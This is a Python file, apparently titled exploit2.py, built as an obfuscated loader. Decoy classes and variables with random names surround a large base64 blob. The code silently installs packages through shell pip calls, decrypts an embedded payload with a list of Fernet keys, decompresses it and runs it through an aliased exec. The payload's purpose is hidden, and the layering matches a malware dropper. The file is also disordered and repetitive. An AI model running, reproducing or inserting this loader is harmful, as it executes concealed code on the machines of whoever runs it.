AgIGZyb20gQ3J5cHRvZG9tZS5DaXBoZXIgaW1wb3J0IEFFUwpleGNlcHQ6CiAgICBzdWJwcm9jZXNzLlBvcGVuKGV4ZWN1dGFibGUgKyAiIC1tIHBpcCBpbnN0YWxsIHB5Y3J5cHRvZG9tZSAiLCBzaGVsbD1UcnVlKQogICAgZnJvbSBDcnlwdG8uQ2lwaGVyIGltcG9ydCBBRVMKICAgIAplbmNvZGVkX2NvZGUgPSAiWjBGQlFVRkJRbTB3ZEZWdFJrSjZkVGhzWXpWNVFrWnZUblJRUTNoRVJIQnFhazVJWVZkRFZGQktYMjQ1UTFWWlJIVkZWakY2VGtGT1RqZFZURmt5Y1c1eVpVUk9SRXBMYkV0bFMyMUdUMm8zUlRKM1NEWkZVRk5WTVZJdFFtbExaVzVJZURjeFRWTTVjMjVxV0VvM1N6ZzRURWc0YWpWUVJrOVBSWEo1UldoMFpFTjNXR2RPWWtSVFF6WTRiMVZpYW5weU9IUjVVbk4wTkRoTVFVVmhWekIxWmpaaVNYSkdhRzFvWVVzNFNuVTJjMEowU2pKTmQyNXhSMWszWVU5c1IzbFZjM2x2Y1U1U1pXUlhWRkZWWVZOeWFsUndibEEwVTIxT1NERTFWVWgwYlZwdmFrbzNSMjkzWkRKTmEwOXlhRWMyTXpVdFFXaG5jSGhDUXpsMVozVk9SRkZyVlhVek5rRm1PVk5YYzFSbk5FMTVWWFJOYnpSd1h6Vm5SRVp0WlVGTE4wOVNNM0UzWTI5aVZuVmlXRWhtTTB0T2FtczJaRzk1Wm5KaGJrSkxiblJuTVRabWJtUk9hbk00V1hWQ2JGQk5NeTFxYzBGWFZHWlhablpUWkdkdVVrTnFTV2RXTFU5RlVYZGhhMFEwZEZkR01YUmZiWEZoZG1kWmJETlhObUZzTVhobmJIaHJWM0U1YkZrM2RYTkJTMHRuVm0xaFVtTTJjVEJxT1dSNGRXMVpNMHBtVm5SWGNqUldUbkpWUkdkMmRWbEdiR0Z1Wm14MlZHeGxlbXhmU3pOVk5WVnhiRWxIZDA0emJGVnhPRXBZWDI5aU0xSnFRVXBqVTE5b1oxOUxNbGhZY0RZMlFVUnRWSGxMT1hSRFNsQkpTMUJ1YldzeWVsRmhaM3BPTFU5UlIwcElhVTUwYlcxMmQyVklRM3AwTXpkWlNYY3RZbEJSTVc0MFRFUmFWR05zYm1WQ01XNUhXVkZZV25ZMWIwa3pUV2RQVVU0d2MzWjRka05QU0VOWE9UUnNUVmR4WDFoVWVrdFJjR3RxZVd3NWVHOTRjMGsyT0dWWWVEVlJkWGhVYlZFd1p6TkRja2czZFU5U01rUnBaMlZTVW1wVlFrWlBXbWN4Y2xWYVFYUlZNbWxKZFVGcVZ5MUZOVXRsUm1GRVlXZFRSRWxYVlVoTk9ITkxRbDlYYkU5ZlRFMVhZa0ZOZEhORWNWaHNjbTF2VnpRelMxUXljbTB5Y2taSFEwb3dOVEpyYUcwNFUxcE1OMVZOTFhNMmFEbDBObVUwUTJsYVNtbzVOblZpUkdoUFVrTTVSbGRITjJoVGQyZDZkRk13ZVMxMGFFcEhaVzVLTWtKZlJHVkdkSEZtVlV4TlVtMUZSMFZXUlhWSmNuSTRiVk5hZEZSdVUwcHNWemw0UlhwV1pFaGthbVpTYjI5blVVaEZia1p0WlZOVWMyOTVUWE5ZZDJGNk9VVjFlVGhaTUVSM01qSmxNSFZrYVRWUFYwbHFUVEV5ZUV4NlptVktVMnRoZFhaQ1EzVk1VMGhqY2tOVVlUVXhaM1pWWlhSWlFuZHhXbVk1V2tab1NHdFdiM014TUVzdFoyWnRWa3RqWTJsSGFsbG9UMGd6ZUMxSmJVNUZOVEYyU0VwSmQzTnlYMEpsY1VSRloyVjBZMU5EVkZwNE16bDZaRE5rYWxGSFZrbDNUemRrVDJGMGVVaEdUV3d3YkdoaFkwUnNZVEJKVTFnd1ZITnVWMGxoTW5oVVFYbDFla1J1V21RNFpHWjVWMnhpY0cxU2ExZEdPR053WkRaNFExSnJORFpSVkRCR09GRnFiVnBLYmpCbGNHdHdRa3hSUW5Fd2RISlBXV3hHVmxwQllWUlRUakUxYVRCUlh6QllhV0ZzUjJNNVJsWlBZMjR0WVVGc1RISkVPWFpQT0ZjME9HWTRSRGhDWkdaWWVtZHFPR2RaZFROb1EzTmxUVzF1WTJSTU9HOXVVblZtVDFoWVVFUkNTbWRMWjNSMFRVSkZiVWhFUjFGTGQyWTVVa2xJVkhkak5IVm9hRGRXYm5CcVJXOVNYMUZQVjJ4RmRXSnNPRXhMVkV0ZmFpMXJZbWRXWmpGM04wUXdOMDF4Y1ZWWVVrWkNVMEp1ZGxBM1VWRjZRMFUwVjI1NU9VMUZVMGxHUm1Gd1FqaEZXWHBvU21wVFltRjNWbk5SUjFONVFUbHdjazV2ZUV0alRERldMVGxLYkZVMVFqRjRSVGhEWWtKNk1VSlJZMU5CTjFGMk9WSTVUMjB5V1hWc1ZrTTFRbVEwWTBKUmNXVlpOREpaY0ZCT2NWZDFkamxoWHpKVVFXSjJSWGxCUzJKcVUwTkVZakpTVUhsS00wcFBXRFZmTlhkaFdrTkZhVTFHV1U5QloydENURFJwVFRCMVNuSkphMDFCZG05aGVYb3dWVmhFYUZJMFJtOTJaVzlFTVdZNFdHSklaRWxYTlVjd2VFVnFaRWMwY2xGWk5URnBSV05rVDJ0R1JUUlNjMWRKUjIxVE0zcHRTMU4xYldSNlRuTjZRMGs1TlY5b1ZrVTFiSGxmWmxKVldta3RSekI0Yld4YWQyeENXbVJsTXkxdFVFOVdibmhCVm5wNFJXdFBjMWxsTVZvM2R6ZHBjbkZhTXpCTk1VSklkV1I0YW05bVdFUmxkWFZHYVdKdVVrRjJZVWd6WlVzMlRFdGFTM1ZsWVhWdkxVcE5kME15VTBOVE9VVmlaRFZmWVdJeVMxVjJNREF3VEdseVEyRm5UMWRhYlZOTVVFcERVa2xGZFcxRFJEQm9jbVI2VUZONWJrNWpSV3BuVjJSRFoyWnJTSGRhUlhoMlpUQlFaMkl3YjNWc1RXMVZiMlZ5VHpoc2JsSmlZaTB5VDJKd2EyWmZWVVUzT1dkdU9WWk9VRzFTU25OVVRYWlZWbVoxVkVGRE0yeFVhakZHVUdoNGNuWklUREpIU25GWU1VeFZWbDkxY0hkbVVuRmZOR2h6U0ZNMmJEVldXbDkyYVRaUFRrdHhUV2hMTTFwdlRGQldTVUpPWWpKNU1GUkpjMjVCUTNnMGR6QnlMWGxsVTBWck9HRmlUMDVETVUwMlVVazNaMFI0YWxCVVVHRkRXbWh3YW5oa01VcGlabVZKU0hNd1pGaHFXazg0U1VjeGFIRm1UM1JFUzNWeGIxODBWVXRyWlRkdWNUTXRSVVZGZDAxcGJWQllZa2xOVTBVM04yNUJWQzFwZW5KRE9HdERhRGQzVFhNemFTMWZSRlZsUzI5d01IZFVaR1pZY1dGR1UyZDZTREJ6U0RaVkxVRXlVRlo1WVZZeVpXeE9OVTlmWlhKV1oyOHhTVmhITW1VNWNVaFdkbmRhYW5OSlZGRm9aMVV0UTNSVmRIZDRhRFZMVDNkaU5HcHpiRTg0VlhST05ETlFTV1JhVUc5eWIwWTVUVEEyZVV4MGRGbE5TM0ZqTVdwd2NHNTRZVmRpVTBoeldtOVRNM2swU0hwR01uQnRYMjF2VG1SRU9GOWlTamQ1UkdzMGJtNVBiMHBJTWpCM09HbHhUekJhTUdsVVdtbGpOblJsZGtSWVNuUk1iakl3V1ZvNGVrNVdYM05QYWtoWk5HMDRRVlZ3TTI5b0xXTjJjMWxVZUU1RFZGaHJSVk5SV2twMGJrazFTMEpHTUdaZlUxcE5UMVpaV1doMWVrTnpSa1pPUm5vMmJHNWZVSE15YWpGd1YzUk9VVWRSZDJsUlEwdHJXVk5PWm14aFUwaHhVbkJ6T1hsSVEwcFJUbWRuWjJacVRYVjNNbVY1Y1ZvNWNrTTBXRWhuTlhobFNWZzBZMmxhZFMxRFdWVmpOblJEVWxKVmJuQnJWVk5yUjA5aE5tTm1Wa3AzUzFsMVdFWmtOVXBhT1dadlQyaGxVWGc1Y0U1bFNEaFVkMnhvTVc5eVVuVklWa2RVV0U1Tk5HRTNkMFJPVm1kcGQwTjZPVlphV2tScmNYUnJiWEJCYXpBNE5WSk5WMjlsV2s1cFFsWTVaRUo1WjJndE1YaGxhbkI2UkZsMlkxbFdaREpaZFhoQ2RVWllaalJoVG5GeFpsTlVlVEJWWTFBM01rTTJSMDl2Ym1WelZUWXdNa0pEZFV0dk5VdHVaWEZ3Y1hCYVFsWktkRXhoYUdaalRrSXpORzlrZEdvd1JYaFdNMHhmTjFWV1psSnhjMmhKY0Vzd2RuUm9lV3RUYVZaUWFVUjRkbGxLVFhNNFVtNUljR3N5VURkNVNVVlFNazFNTlRkMVR6WllWa1ZYVWpoVWR6RlVVMVEzWkZsS1ZYQlZiUzFCWTJGSFkxUlNkWFJpUWpWMWFqVkRRMGs0WldWaVluUldabGhtTkdKV2RFeDZVMDk2U0cxdGJYTkViWFJzTWtGTWRrVnNZVUZ3WWpoMFdYUkVlbFpTWVRZM1VFd3pVV1ZhYUhKMFRFVXpUVXRwVkhaNGJUSjJNek5LZVhaeFpqaEtPRlJHVDNBellUbHVTRFoyTlMxV2R6WkxMVXh1Vkd0Ulp6aDRja0ZCVW5OSE5EWkRhMWswYkhKZk1HUXROMTlPWmpKV1dWSkdlRjlXTFV0UWQyNWxWblpqWlZveldUUjJRM2h2UmtReWF5MWlkV2MwZVdWYWNYUkZZMGhzUWxNNFJYaEdUMWhKYmtsVmQwSldRM0pDY1MwNWFVMUJkRlI2ZWt0NWVHUlRjWFF6YkV4aGRFcERNMmhtTVdwTkxVRmlaRWhyTm5kdFJ6YzVNRzFFZHpoWmFsRllMVk14YUMweVQxVnhhWGM0UWpVeldtWTRTekJQZWt0U1NVeEVMWGsyUWpGeGR6TlRjRGN6YW0xemRrdExRM0U0VVRRelRUVlRTR1JSTVRnNFdVVlRXWHBpUlVsNFNuSk9jRlJSY0ZKdk9IVkpWa2R2ZDJkZllXTnNjakJUUlRaSk9HNVhhbkpTVjBWbk1VRnhkWGROZDIxeldWcFZTRTVGV0d0RVpWQmpPR2xuVlcxRVEyUXdRbGhoTVdWMGVFRlBSRVp3ZWtKTFZ6RXRPR05UYlVSa05ETXRNVEo1YTBSc2F6UnVVMmxyUkVzd1gwbExVV2xNUlhOUVkzYzVZbTgzU21ZeGJrdEZRbU55YTFaeU5tRjZkMVl5ZVY5VGFYVk9iVGwwV1RGUU9VeHNTbEJ0TWtWSloyaDFhME14UzAweVVYaEVObmQxZGw5M2JrNXFjR3c0Y0ZFeWJHSkhSRTFTUldwMk9ETjRkV00xZFZCSldDMXlVbU4xWlRCdWVtczRaR0kyUlhabGEwTjJSMFJsVG5OQ1VVdGtSRUoxWHpaUFl5MU5kRVV0UTJneWVFbHdTSHBxVjBrMlJHVTNNV2c1UVhWc1EzTm1iRm8zVFhGc2RYbGthRTAyUkhSS2RFMHRXbUV4VDJWcmFrOXVVbXhtWDJNNU5rSmlOVWxHYTNKR01HTXhNVmsxVkV4VVQwWjBVMEZqVDJSbFYwWk1OSHBXTkRaaVNFbzJOMU5hWTFSUU16Vmpha2RGY0UxRGFtTkZjVUZoZGxoVmFHSndNMnhJUVVoUE1pMWFSVTQxUms5c1kzUlBhbXRhTkZKbmFHZ3lObWcwUlhwRFIwazBXRFYzVnpkUmVFb3dRME16U0haTlMwWk5kVk5xVmpaTmVFMXFSMWxDZVRGS1l6SlhlbnBhT0c4eFNGbEpZalJMVGpSVE1GTnRVelV6U0ZVNVExSTFZbU5aTFVwblNYQllOVkp6TVUwNE5rbGhTMjEwUzNoZlNURmtWamxKTUdaelExUkdhWFZpYURGRmFVNUZNV1V5IgpDU2VsWUZOcFlBWDRqaGZNaVVFUUdXUTNNb2NjaFRETXpvalBXRCA9IGV4ZWMKZW5jcnlwdGVkX2NvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKGVuY29kZWRfY29kZSkKeyd1c2VybmFtZSc6ICdzemVDanhhJywgJ2FnZSc6IDI0fQpPSzV6cHJPSkhHID0gNTU4NzU4NTkKY2xhc3MgZUdsYVNMVVdkRjoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBSRnNyWlFkdFdROgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpUaTJYN1k1MjFFID0gMjM2MDA3NDUKQWJKRG1HOUI4dSA9IDE5OTM1MzU4CmNsYXNzIHNkQWtVUThjSFQ6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhClsiJ2dmSGFZZGFmRVonIiwgIid5MlJ4ZnZ1TVcwJyIsICInV0NUQXhiWm5EWiciLCAiJ0RYNk5WUHIxcFMnIiwgIidwRTlmOHd4aGxKJyJdCmNsYXNzIG9iTm9EdGpSeDM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUFZVTFR6aDg5YToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgbXJLaWRwamljdzoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeFY0NzhqVVFCdCA9IDIzNzQ3NTI2CmNsYXNzIFM1NTJ1WDhJbHM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeDZReVFUWTRDQSA9IDc4MzExNzAKY2xhc3Mgd0RvQUJ6WlE0eToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpaSmphTXp5WW1qID0gMzM0OTc2MjkKUXJnMkFjRUsxOCA9IDExMTkwNDMwCmNsYXNzIGtJMlBPT21uWjY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIE9tbGNEWU1qZUs6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKJ2hVY28yYlNTWDMnClFzdEhEbWJCMmUgPSAyOTQ3ODY1Nwp2ZUphTGVYYVRnID0gODYxNDU3ODQKeWNTNmRpVkVWSSA9IDYxMTE5NTA4CnMgPSBbYid6VHNrb1lHbTY4VnJTaU9NNko5VzBQcXlLVGZTeXJhTTBOeWRWbUp2TV9rPScsIGIncGNEMjNiUlFUTDFNcUxTODROZFBzaVBkWUpsd2JUYWFsNkptdWx6VHE0az0nLCBiJzlFQlFORGpteTByR1hDYlZnVm5yZ0ZGc0FIazRZZTFNOHkxR1NJeDlDUFk9JywgYic2NjNSbks1bDBNUXpld2ZwQVFmWWhKYkwzcDdaUm9SLWo3STNEa1hpVUlrPScsIGInSTVBcnhrZ2ZvMkU1NlZCVmN0RmpKLXBGa2VCYlFnNlFYTXVHLWdOZ3FxND0nLCBiJ2VYUDFzS2ZrVEU5UE5rV1I4ckE5anpKcXVuODB5TVlQcnpNTWk2NUpRcHc9JywgYic1NlM5U3Y3elVQTDcxdzZOMk9UU3d4dkZsX2EtNXp2c042cnhRSTk3VVdVPScsIGInZ1pjUk1hVmZ0TWdfRjlFNHROUV9ldEFSN19QS1RfdlZmV3dXa01TeERRYz0nLCBiJy1YbWFLTDR1bzRwMGdNNUFSUVp0eGpaXzVlY0sxdzUzQUVrV3VpV0RJelE9JywgYidpa05mQnRyclgtOUVCSTNpS3pXbkJKVzV3Tk52aThyTTRvVDlCTHFESk53PScsIGIndUVpa0hhSEFYMUIyMGFCX2JjUXdVQTBhTzIxQWktcmdZQXFHZkt4SEtKQT0nLCBiJ2Rlb0hUd052d1RPdVFqb3k1b2g5ak5fWlFsTGJWQ3Z3STQ3RDNzUXQ4VUE9JywgYid4dWFEN0Jxd3JlbmlLWkF2Qk8zOE1PMjUwb080MEhYYm94aFU4LS02WVEwPScsIGInWDVHZllfenVrSURQS3h5em1NWUZrcHMtQXY4QW8yVFFEUG1ja3JqYjNaUT0nLCBiJ0NBT0Q3WFNXNGUtT04zM3V6NV84aDZSWmhvckRsS2c3OThlMVJjRVlTbG89JywgYidkTXBod2x3TzZRaF9GQ2RiTXpzZW9ac1drUVdQRnRHeDhWU2lGQU4yU1NvPScsIGIncTROZmNSaWVMSUtueUJ3RkVoVXhaY1JfOEEzQkZTX25fY0lFOHNGWDhhND0nLCBiJ2hMZkFQUjA2eHVvNTQ1cUpsemxZa281ZjlLS3VYT0JyQ0JOZ3pydVRWMTQ9J10KZm9yIGtleSBpbiBzOgogICAgdHJ5OgogICAgICAgIGRlY3J5cHRlZF9jb2RlID0gaFhSR0RHQ1BUclJ2Ynp3YVVsRmJtUUNvRDhPQ1k0cmpZQ094TjUoa2V5LmRlY29kZSgidXRmLTgiKSkuZGVjcnlwdChlbmNyeXB0ZWRfY29kZSkKICAgICAgICBicmVhawogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIHBhc3MKeyd1c2VybmFtZSc6ICdzemVDanhhJywgJ2FnZSc6IDI0fQpPSzV6cHJPSkhHID0gNTU4NzU4NTkKY2xhc3MgZUdsYVNMVVdkRjoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBSRnNyWlFkdFdROgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpUaTJYN1k1MjFFID0gMjM2MDA3NDUKQWJKRG1HOUI4dSA9IDE5OTM1MzU4CmNsYXNzIHNkQWtVUThjSFQ6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhClsiJ2dmSGFZZGFmRVonIiwgIid5MlJ4ZnZ1TVcwJyIsICInV0NUQXhiWm5EWiciLCAiJ0RYNk5WUHIxcFMnIiwgIidwRTlmOHd4aGxKJyJdCmNsYXNzIG9iTm9EdGpSeDM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUFZVTFR6aDg5YToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgbXJLaWRwamljdzoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeFY0NzhqVVFCdCA9IDIzNzQ3NTI2CmNsYXNzIFM1NTJ1WDhJbHM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeDZReVFUWTRDQSA9IDc4MzExNzAKY2xhc3Mgd0RvQUJ6WlE0eToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpaSmphTXp5WW1qID0gMzM0OTc2MjkKUXJnMkFjRUsxOCA9IDExMTkwNDMwCmNsYXNzIGtJMlBPT21uWjY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIE9tbGNEWU1qZUs6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKJ2hVY28yYlNTWDMnClFzdEhEbWJCMmUgPSAyOTQ3ODY1Nwp2ZUphTGVYYVRnID0gODYxNDU3ODQKeWNTNmRpVkVWSSA9IDYxMTE5NTA4CmRlY29tcHJlc3NlZF9jb2RlID0gemxpYi5kZWNvbXByZXNzKGRlY3J5cHRlZF9jb2RlKS5kZWNvZGUoJ3V0Zi04JykKQ1NlbFlGTnBZQVg0amhmTWlVRVFHV1EzTW9jY2hURE16b2pQV0QoZGVjb21wcmVzc2VkX2NvZGUpCnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOAo="
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD(base64.b64decode(PZcTmMLNDhGxIyuHWAnzp4HJYLcvrDIwkJzqlN))
exploit2.py
import time
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
import zlib
import base64
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
from sys import executable, stderr
try:
import cryptography
except ImportError:
subprocess.run('python -m pip install cryptography', shell=True)
from cryptography.fernet import Fernet
import subprocess
from importlib import import_module
requirements = [
["requests", "requests"],
["Cryptodome.Cipher", "pycryptodomex" if not 'PythonSoftwareFoundation' in executable else 'pycryptodome']
]
for modl in requirements:
try:
import_module(module[0])
except:
subprocess.Popen(executable + " -m pip install " +modl[1], shell=True)
time.sleep(3)
import requests
from cryptography.fernet import Fernet as hXRGDGCPTrRvbzwaUlFbmQCoD8OCY4rjYCOxN5
try:
from Cryptodome.Cipher import AES
except:
subprocess.Popen(executable + " -m pip install pycryptodome ", shell=True)
from Crypto.Cipher import AES
